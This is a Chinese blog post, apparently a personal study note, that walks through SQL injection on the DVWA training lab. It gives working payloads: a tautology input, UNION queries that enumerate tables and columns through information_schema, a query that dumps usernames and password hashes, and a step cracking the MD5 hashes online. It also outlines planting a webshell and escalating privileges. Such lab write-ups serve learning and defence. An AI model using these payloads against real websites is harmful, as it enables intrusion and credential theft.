zoukankan      html  css  js  c++  java
  • DVWA-SQL注入

    SQL注入解题思路

    1. 寻找注入点,可以通过web扫描工具实现
    2. 通过注入点,尝试得到连接数据库的用户名,数据库名称,权限等信息。
    3. 猜解关键数据库表极其重要字段与内容。
    4. 通过获得的用户信息寻找后台进行登录。
    5. 利用后台上传webshell或一句话木马,进一步提权拿到服务器权限。

    1.随便输入id 1,2,3…… 进行测试,发现输入正确的ID会返回First name和Sumame信息,输入错误的id不会返回信息

    2.使用 1'or'1'='1 遍历出数据库表中的所有内容。

    3.此时我们可以通过使用user(),database(),version()三个内置函数使用 1' and 1=2 union select user(),database() --  (注意插入的命令的格式以及空格)得到连接数据库的账户名,数据库名称,数据库版本信息。

    4.猜测表名,通过注入 1' union select 1,group_concat(table_name) from information_schema.tables where table_schema =database()# 

    5.猜测列名,通过注入 1' union select 1,group_concat(column_name) from information_schema.columns where table_name ='users'# 

    6.猜测用户密码,通过注入 1' union select null,concat_ws(char(32,58,32),user,password) from users #  

    7.得到的用户后的字符串为哈希值,可以登陆 https://cmd5.com/ 对MD5进行在线破解为明文密码。

    文章仅作为学习笔记,欢迎指正,不喜勿喷!
  • 相关阅读:
    HDOJ 2095 find your present (2)
    HDOJ 2186 悼念512汶川大地震遇难同胞——一定要记住我爱你
    九度 1337 寻找最长合法括号序列
    九度 1357 疯狂地Jobdu序列
    HDOJ 1280 前m大的数
    九度 1343 城际公路网
    九度 1347 孤岛连通工程
    HDOJ 2151 Worm
    九度 1342 寻找最长合法括号序列II
    九度 1346 会员积分排序
  • 原文地址:https://www.cnblogs.com/Hunter-01001100/p/10975977.html
Copyright © 2011-2022 走看看